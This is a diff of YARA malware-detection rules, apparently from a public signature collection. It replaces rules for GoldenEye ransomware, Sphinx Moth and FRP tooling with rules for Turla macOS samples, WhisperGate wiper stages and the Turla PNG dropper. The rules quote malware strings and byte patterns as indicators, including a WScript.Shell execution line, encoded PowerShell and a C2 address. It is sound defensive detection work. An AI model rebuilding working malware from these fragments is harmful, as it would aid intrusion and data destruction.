-		score = 80
+		logic_hash = "12b18c9e03f1a471541de2fb3ecc6b90a13910ca299a9b7d2bad9dd11f881506"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060"
 
 	strings:
-		$xc1 = { 2E 62 61 63 6B 75 70 00 2E 63 6F 6E 66 69 67 00   // .backup .config
-               2E 64 62 00 00 00 00 00 2E 73 71 6C 69 74 65 00 }
-		$xc2 = { 00 5C 5C 2E 5C 25 63 3A 00 25 63 3A 5C 00 00 00
-               00 4E 54 46 53 00 00 00 00 5C }
-		$x1 = "%s:%d:%s(): [+] Overwriting \"%s\" \"..." ascii
-		$s1 = "C:\\Windows\\System32\\drivers\\beep.sys" ascii fullword
-		$s2 = "\\DosDevices\\sectorio" wide fullword
+		$s1 = "/Users/vlad/Desktop/install/install/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		( uint16( 0 ) == 0xfacf and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Goldeneye_Ransomware_XLS : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_2 : FILE
 {
 	meta:
-		description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6eafcc35-56ef-534f-884a-0bb47c27c274"
-		date = "2016-12-06"
+		id = "b3e94016-591c-5e39-b5e7-328e0761e535"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jp2SkT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_goldeneye.yar#L10-L24"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L27-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "827c1d1c0f9c3ebd77413de7e1db5e29d05f2ece6676c79a79f6c1ff2788f42b"
+		logic_hash = "35bd8650afbc515ecd1cef393fd75f9b77a1e31111612227f0f4557fe8b312a7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
+		hash1 = "b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea"
 
 	strings:
-		$x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
-		$x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
+		$s1 = "b_openssl: oops - number of mutexes is 0" fullword ascii
+		$s2 = "networksetup -get%sproxy Ethernet" fullword ascii
+		$s3 = "012A04DECBC441e49C527B2798F54CA7LOG_NAMED_PIPE_NAME" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 1 of them )
+		( uint16( 0 ) == 0xfacf and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_Goldeneyeransomware_Dropper_Malformedzoomit : FILE
+rule SIGNATURE_BASE_Snaketurla_Malware_May17_4 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6ebf2d13-7d58-5a1b-a836-66d533f408e8"
-		date = "2016-12-06"
+		id = "797dedd6-a13e-529f-bae4-4043294672c4"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jp2SkT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_goldeneye.yar#L26-L40"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L44-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c18405a272c9210973e3184b8267306919cba8795b12d5982a9e3e8f748f9782"
+		logic_hash = "7b6aac2313ea7dae572114e92ad0b5437c5be2542853de3b184bef780faee68b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
+		hash1 = "d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2"
 
 	strings:
-		$s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
-		$n1 = "Mark Russinovich" wide
+		$s1 = "Install Adobe Flash Player.app/com.adobe.updatePK" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
+		( uint16( 0 ) == 0x4b50 and filesize < 5000KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT_Donotteam_Ytyframework : APT DONOTTEAM WINDOWS FILE
+rule SIGNATURE_BASE_Snaketurla_Installd_SH : FILE
 {
 	meta:
-		description = "Modular malware framework with similarities to EHDevel"
-		author = "James E.C, ProofPoint"
-		id = "6dd07019-aa5a-5966-8331-b6f6758b0652"
-		date = "2018-08-03"
+		description = "Detects Snake / Turla Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65a97c0d-5c69-5e58-9a18-10e5684bc218"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_donotteam_ytyframework.yar#L3-L43"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1e0c1b97925e1ed90562d2c68971e038d8506b354dd6c1d2bcc252d2a48bc31c"
-		logic_hash = "8e2841fd4550f12d88fb451a893f1ba41f0d3c123d9c195fe97366202376ef61"
+		logic_hash = "5b16107434951ddb212996909d53dfbcdae74ed13df6690ce3f6c74258ab4670"
 		score = 75
-		quality = 83
-		tags = "APT, DONOTTEAM, WINDOWS, FILE"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/football/download2/" ascii wide
-		$x2 = "/football/download/" ascii wide
-		$x3 = "Caption: Xp>" wide
-		$x_c2 = "5.135.199.0" ascii fullword
-		$a1 = "getGoogle" ascii fullword
-		$a2 = "/q /noretstart" wide
-		$a3 = "IsInSandbox" ascii fullword
-		$a4 = "syssystemnew" ascii fullword
-		$a5 = "ytyinfo" ascii fullword
-		$a6 = "\\ytyboth\\yty " ascii
-		$s1 = "SELECT Name FROM Win32_Processor" wide
-		$s2 = "SELECT Caption FROM Win32_OperatingSystem" wide
-		$s3 = "SELECT SerialNumber FROM Win32_DiskDrive" wide
-		$s4 = "VM: Yes" wide fullword
-		$s5 = "VM: No" wide fullword
-		$s6 = "helpdll.dll" ascii fullword
-		$s7 = "boothelp.exe" ascii fullword
-		$s8 = "SbieDll.dll" wide fullword
-		$s9 = "dbghelp.dll" wide fullword
-		$s10 = "YesNoMaybe" ascii fullword
-		$s11 = "saveData" ascii fullword
-		$s12 = "saveLogs" ascii fullword
+		$s1 = "PIDS=`ps cax | grep installdp" ascii
+		$s2 = "${SCRIPT_DIR}/installdp ${FILE}" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and ( pe.imphash ( ) == "87775285899fa860b9963b11596a2ded" or 1 of ( $x* ) or 3 of ( $a* ) or 6 of ( $s* ) )
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_VUL_Jquery_Fileupload_CVE_2018_9206 : CVE_2018_9206
+rule SIGNATURE_BASE_Snaketurla_Install_SH : FILE
 {
 	meta:
-		description = "Detects JQuery File Upload vulnerability CVE-2018-9206"
+		description = "Detects Snake / Turla Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20bac44c-0e5a-5561-9fd8-a71cd2d8590a"
-		date = "2018-10-19"
+		id = "68775c54-46f8-5d44-ba63-6726d2bb8016"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_jquery_fileupload_cve_2018_9206.yar#L1-L16"
+		reference = "https://goo.gl/QaOh4V"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snaketurla_osx.yar#L74-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef7cc13130c60ece346802cb6efec96065f84407fb84b89703628fdf32c0ee53"
+		logic_hash = "019d20ca6632759cf01962d336c22831edc64b6927d8b27d026b76eb118fce02"
 		score = 75
 		quality = 85
-		tags = "CVE-2018-9206"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "error_reporting(E_ALL | E_STRICT);" fullword ascii
-		$s2 = "require('UploadHandler.php');" fullword ascii
-		$s3 = "$upload_handler = new UploadHandler();" fullword ascii
+		$s1 = "${TARGET_PATH}/installd.sh" ascii
+		$s2 = "$TARGET_PATH2/com.adobe.update.plist" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_FRP_Apr20_1
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects FRP fast reverse proxy tool often used by threat groups"
+		description = "Detects unknown wiper malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55483832-0e0b-5c28-8be5-dbd14ddb50e3"
-		date = "2020-04-07"
-		modified = "2022-11-03"
-		reference = "https://github.com/fatedier/frp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_frp_proxy.yar#L2-L22"
+		id = "f04b619e-1df2-5c51-9cab-4a0fffd1c042"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21f91fd99aed8b62d804504889c41ca77567fd345cf4ea0ef00161eefa9324a7"
-		score = 70
+		logic_hash = "72eb50a70b3f2fbb232134ef4706dbb15bdb5893fe06d899bff3b7aacdfadd30"
+		score = 85
 		quality = 85
-		tags = ""
-		hash1 = "05537c1c4e29db76a24320fb7cb80b189860389cdb16a9dbeb0c8d30d9b37006"
-		hash2 = "08c685c8febb5385f7548c2a64a27bae7123a937c5af958ebc08a3accb29978d"
+		tags = "FILE"
+		hash1 = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92"
 
 	strings:
-		$x1 = "frp/vendor/github.com/spf13/" ascii
-		$x2 = "github.com/fatedier/frp/vendor/" ascii
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg6 = "<?xml"
+		$xc1 = { 41 41 41 41 41 00 59 6F 75 72 20 68 61 72 64 20
+               64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63
+               6F 72 72 75 70 74 65 64 }
+		$op1 = { 89 34 24 e8 3f ff ff ff 50 8d 65 f4 31 c0 59 5e 5f }
+		$op2 = { 8d bd e8 df ff ff e8 04 de ff ff b9 00 08 00 00 f3 a5 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 03 00 00 00 c7 44 24 0c 00 00 00 00 }
+		$op3 = { c7 44 24 0c 00 00 00 00 c7 44 24 08 00 02 00 00 89 44 24 04 e8 aa fe ff ff 83 ec 14 89 34 24 e8 3f ff ff ff 50 }
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_HKTL_FRP_INI_Apr20_1 : FILE
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_2 : FILE
 {
 	meta:
-		description = "Detects FRP fast reverse proxy tool INI file often used by threat groups"
+		description = "Detects unknown wiper malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c652c9c-715d-5ba5-821a-3e533b1e78c6"
-		date = "2020-04-07"
+		id = "822e5af5-9c51-5be3-94f1-7e0a714743e6"
+		date = "2022-01-16"
 		modified = "2023-12-05"
-		reference = "Chinese Hacktools OpenDir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_frp_proxy.yar#L24-L44"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L25-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc997dc876d7a49292b62a0fb4ff12b34dacacfd8a1b90226d6a9aee303cacdf"
-		score = 60
+		logic_hash = "87a03e95bc1c33d1b3343ec7369c516bb15791943fbb122de11867ad4bddd565"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		hash1 = "1dabef3c170e4e559c50d603d47fb7f66f6e3da75a65c3435b18175d6e9785bb"
+		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
 
 	strings:
-		$h1 = "[common]" ascii
-		$s1 = "server_addr =" ascii fullword
-		$s2 = "remote_port =" ascii fullword
-		$s3 = "[RemoteDesktop]" ascii fullword
-		$s4 = "local_ip = " ascii
-		$s5 = "type = tcp" ascii fullword
+		$sc1 = { 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00
+               6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00
+               55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00
+               63 00 67 00 42 00 30 00 41 00 43 }
+		$sc2 = { 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00
+               70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68 }
+		$s1 = "xownxloxadDxatxxax" wide
+		$s2 = "0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==" wide
+		$s3 = "https://cdn.discordapp.com/attachments/" wide
+		$s4 = "fffxfff.fff" ascii fullword
+		$op1 = { 20 6b 85 b9 03 20 14 19 91 52 61 65 20 e1 ae f1 }
+		$op2 = { aa ae 74 20 d9 7c 71 04 59 20 71 cc 13 91 61 20 97 3c 2a c0 }
+		$op3 = { 38 9c f3 ff ff 20 f2 96 4d e9 20 5d ae d9 ce 58 20 4f 45 27 }
+		$op4 = { d4 67 d4 61 80 1c 00 00 04 38 35 02 00 00 20 27 c0 db 56 65 20 3d eb 24 de 61 }
 
 	condition:
-		uint16( 0 ) == 0x635b and filesize < 1KB and $h1 at 0 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them or 7 of them
 }
-rule SIGNATURE_BASE_Visualdiscovery_Lonovo_Superfish_SSL_Hijack : FILE
+rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Stage3_Jan22 : FILE
 {
 	meta:
-		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
-		author = "Florian Roth (Nextron Systems) / improved by kbandla"
-		id = "200c016e-7ad8-5b58-be5f-7866e91d60e9"
-		date = "2015-02-19"
+		description = "Detects reversed stage3 related to Ukrainian wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5d562cd-03ef-5450-8044-3f538cea32d0"
+		date = "2022-01-16"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/4nc4p/status/568325493558272000"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/threat_lenovo_superfish.yar#L4-L23"
+		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f156a51dccafe32467b64251507928b1c7a1b04595063aa66aa69da6c4cc4fc"
+		logic_hash = "b06536b6a6eebd5fb398ba2617bf68a5b2c4b0035766b3cd0fc03d95019891ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
-		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
-		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
-		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
 
 	strings:
-		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
-		$s3 = "GetPCProxyHandler" fullword ascii
-		$s4 = "StartPCProxy" fullword ascii
-		$s5 = "SetPCProxyHandler" fullword ascii
+		$xc1 = { 65 31 63 70 00 31 79 72 61 72 62 69 4c 73 73 61 6c 43 00 6e 69 61 4d }
+		$s1 = "lld." wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2MB and all of ( $s* )
+		uint16( filesize -2 ) == 0x4d5a and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Cudacrt : FILE
+rule SIGNATURE_BASE_MAL_OBFUSC_Unknown_Jan22_1 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file cudacrt.dll"
-		author = "Kudelski Security - Nagravision SA"
-		id = "233f657b-029a-5ed4-b2f7-712851297f18"
-		date = "2015-08-06"
+		description = "Detects samples similar to reversed stage3 found in Ukrainian wiper incident named WhisperGate"
+		author = "Florian Roth (Nextron Systems)"
+		id = "647c0092-b03d-5627-8568-ddaa982c73a1"
+		date = "2022-01-16"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L9-L26"
+		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae7ff3d5ffd29de80ce5dcccde9af04d2537a279fe35f6e94257d59a462ba6a0"
+		logic_hash = "26a295d3b78c3a33d776a648aa0f410ac7cb5021ad9d3b294ff9629d6ba7132a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
 
 	strings:
-		$s0 = "HPSSOEx.dll" fullword wide
-		$s1 = "255.255.255.254" fullword wide
-		$s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
-		$op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b }
-		$op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 }
-		$op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 }
+		$xc1 = { 37 00 63 00 38 00 63 00 62 00 35 00 35 00 39 00
+               38 00 65 00 37 00 32 00 34 00 64 00 33 00 34 00
+               33 00 38 00 34 00 63 00 63 00 65 00 37 00 34 00
+               30 00 32 00 62 00 31 00 31 00 66 00 30 00 65 }
+		$xc2 = { 4D 61 69 6E 00 43 6C 61 73 73 4C 69 62 72 61 72
+               79 31 00 70 63 31 65 }
+		$s1 = ".dll" wide
+		$s2 = "%&%,%s%" ascii fullword
+		$op1 = { a2 87 fa b1 44 a5 f5 12 da a7 49 11 5c 8c 26 d4 75 }
+		$op2 = { d7 af 52 38 c7 47 95 c8 0e 88 f3 d5 0b }
+		$op3 = { 6c 05 df d6 b8 ac 11 f2 67 16 cb b7 34 4d b6 91 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 243KB and all of ( $s* ) and 1 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Sphinx_Moth_H2T : FILE
+rule SIGNATURE_BASE_MAL_Unknown_Discord_Characteristics_Jan22_1 : FILE
 {
 	meta:
-		description = "sphinx moth threat group file h2t.dat"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "62d14efd-7d0b-5f66-9e78-74f3f9e2fd5b"
-		date = "2015-08-06"
+		description = "Detects unknown malware with a few indicators also found in Wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23ee5319-6a72-517b-8ea0-55063b6b862c"
+		date = "2022-01-16"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L28-L45"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7aca260d415de84cf432b18385db6a9768a036e3bd0a9aa8ded4a1bfcad26d0c"
+		logic_hash = "f9cf4a15be0ab35a0d0f0c9b1a191f623f905c8fc9da651872de7c025a27a806"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
 
 	strings:
-		$x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii
-		$s1 = "[-] Error in connection() %d - %s" fullword ascii
-		$s2 = "[-] Child process exit." fullword ascii
-		$s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
-		$s4 = "pipe() to" fullword ascii
-		$s5 = "pipe() from" fullword ascii
+		$x1 = "xownxloxadDxatxxax" wide
+		$s2 = "https://cdn.discordapp.com/attachments/" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 156KB and ( $x1 or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Iastor32 : FILE
+rule SIGNATURE_BASE_Turla_Png_Dropper : FILE
 {
 	meta:
-		description = "sphinx moth threat group file iastor32.exe"
-		author = "Kudelski Security - Nagravision SA"
-		id = "5688c598-ea18-578f-bb8a-3729c0502af5"
-		date = "2015-08-06"
+		description = "Detects the PNG Dropper used by the Turla group"
+		author = "Ben Humphrey"
+		id = "459f17c8-0eae-5736-8c7c-286625dc158f"
+		date = "2018-11-23"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L47-L59"
+		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_png_dropper_nov18.yar#L3-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "056949677654a88fb430c988939006dacfefdabbe12824936a01e5aabbb73441"
+		logic_hash = "c859310660603d0748cf17daea0799af7684f2a9f77f729871eb57338fbfcca6"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "6ed939f59476fd31dc4d99e96136e928fbd88aec0d9c59846092c0e93a3c0e27"
 
 	strings:
-		$s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii
-		$s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii
+		$api0 = "GdiplusStartup"
+		$api1 = "GdipAlloc"
+		$api2 = "GdipCreateBitmapFromStreamICM"
+		$api3 = "GdipBitmapLockBits"
+		$api4 = "GdipGetImageWidth"
+		$api5 = "GdipGetImageHeight"
+		$api6 = "GdiplusShutdown"
+		$code32 = {
+            8B 46 3C               // mov     eax, [esi+3Ch]
+            B9 0B 01 00 00         // mov     ecx, 10Bh
+            66 39 4C 30 18         // cmp     [eax+esi+18h], cx
+            8B 44 30 28            // mov     eax, [eax+esi+28h]
+            6A 00                  // push    0
+            B9 AF BE AD DE         // mov     ecx, 0DEADBEAFh
+            51                     // push    ecx
+            51                     // push    ecx
+            03 C6                  // add     eax, esi
+            56                     // push    esi
+            FF D0                  // call eax
+        }
+		$code64 = {
+            48 63 43 3C            // movsxd rax, dword ptr [rbx+3Ch]
+            B9 0B 01 00 00         // mov ecx, 10Bh
+            BA AF BE AD DE         // mov edx, 0DEADBEAFh
+            66 39 4C 18 18         // cmp [rax+rbx+18h], cx
+            8B 44 18 28            // mov eax, [rax+rbx+28h]
+            45 33 C9               // xor r9d, r9d
+            44 8B C2               // mov r8d, edx
+            48 8B CB               // mov rcx, rbx
+            48 03 C3               // add rax, rbx
+            FF D0                  // call rax
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of ( $api* ) and 1 of ( $code* )
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Kerberos32 : FILE
+
+rule SIGNATURE_BASE_Turla_Png_Reg_Enum_Payload : FILE
 {
 	meta:
-		description = "sphinx moth threat group file kerberos32.dll"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "769ee362-2363-511a-8f17-99e66c9bab53"
-		date = "2015-08-06"
+		description = "Payload that has most recently been dropped by the Turla PNG Dropper"
+		author = "Ben Humphrey"
+		id = "413bb315-3c01-56ab-92db-00342a11438a"
+		date = "2018-11-23"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L61-L85"
+		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_png_dropper_nov18.yar#L51-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b672c9b9b0ffffd8f243832ea217bfc10b08026c71d297ee1047ca999fb829c"
+		logic_hash = "b01d0c3a26ce955570ed5607514906bd8860f36637957e39a15f74a7dbb1a1e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "fea27eb2e939e930c8617dcf64366d1649988f30555f6ee9cd09fe54e4bc22b3"
 
 	strings:
-		$x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
-		$x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
-		$x3 = "kerberos32.dll" fullword wide
-		$x4 = "KERBEROS64.dll" fullword ascii
-		$x5 = "kerberos%d.dll" fullword ascii
-		$s1 = "\\\\.\\pipe\\lsassp" fullword ascii
-		$s2 = "LSASS secure pipe" fullword ascii
-		$s3 = "NullSessionPipes" fullword ascii
-		$s4 = "getlog" fullword ascii
-		$s5 = "startlog" fullword ascii
-		$s6 = "stoplog" fullword ascii
-		$s7 = "Unsupported OS (%d)" fullword ascii
-		$s8 = "Unsupported OS (%s)" fullword ascii
+		$crypt00 = "Microsoft Software Key Storage Provider" wide
+		$crypt01 = "ChainingModeCBC" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $x* ) or all of ( $s* ) )
